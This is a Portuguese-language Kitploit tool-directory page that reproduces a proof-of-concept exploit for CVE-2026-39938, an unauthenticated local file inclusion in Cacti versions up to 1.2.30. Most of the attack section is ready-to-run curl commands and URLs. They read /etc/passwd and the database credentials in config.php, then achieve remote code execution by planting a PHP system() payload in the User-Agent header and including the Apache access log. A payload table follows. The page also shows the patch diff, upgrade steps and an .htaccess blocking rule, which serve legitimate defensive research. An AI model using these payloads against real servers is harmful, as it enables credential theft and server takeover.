Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
By-Poloss..-..CVE-2026-39938 — Exploit de prova de conceito para CVE-2026-39938: inclusão de arquivo local não autenticada no Cacti <= 1.2.30, permitindo leitura arbitrária de arquivos e execução remota de código via envenenamento de log. | Kitploit
Ferramentas/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

Exploit de prova de conceito para CVE-2026-39938: inclusão de arquivo local não autenticada no Cacti <= 1.2.30, permitindo leitura arbitrária de arquivos e execução remota de código via envenenamento de log.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1há 2 mesesAinda não revisado
Compartilhar

CVE-2026-39938: Cacti <= 1.2.30 - LFI não autenticado

Resumo Executivo

CampoValor
CVE IDCVE-2026-39938
Pontuação CVSS9.8 (Crítico)
Produto AfetadoCacti
Versões Afetadas<= 1.2.30
Versão Corrigida1.2.31
Commit de Correção9871f0c

Detalhes da Vulnerabilidade

Causa Raiz

A vulnerabilidade existe em lib/rrd.php onde o parâmetro graph_theme é usado diretamente sem sanitização:

CÓDIGO VULNERÁVEL:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

CÓDIGO CORRIGIDO:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

O problema: Nenhuma validação contra sequências de travessia de diretório ../, permitindo que atacantes leiam arquivos arbitrários sem autenticação.


Prova de Conceito (PoC) - Passos Simples

Passo 1: Verificar Vulnerabilidade - Ler /etc/passwd

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

Resultado: O conteúdo do /etc/passwd será exibido na resposta.

Passo 2: Ler Configuração do Banco de Dados

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

Resultado: As credenciais do banco de dados (usuário, senha) serão expostas.

Passo 3: Execução Remota de Código via Envenenamento de Log

3.1 Injetar Código PHP no Log do Apache

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 Executar o Código Incluindo o Arquivo de Log

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

Resultado: A saída do comando (ex.: uid=33(www-data)) será exibida.


Endpoints Comuns Testados


Exemplos de URL da PoC

Teste LFI Básico

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

Ler Configuração da Aplicação

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

Envenenamento de Log (Injeção)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

Com Cabeçalho: User-Agent: <?php system('id'); ?>

Envenenamento de Log (Execução)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

Remediação

Atualizar para a Versão Corrigida

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

Verificar se a Correção foi Aplicada

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

Mitigação Temporária (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

Referências

  • Aviso de Segurança do GitHub
  • Commit de Correção 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • Canal do Telegram W.P.E.F #1
  • Canal do Telegram W.P.E.F #2

Relatório gerado para fins de pesquisa em segurança Data: 27 de junho de 2026

Baixar ferramenta
EndpointParâmetroExemplo de Payload
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log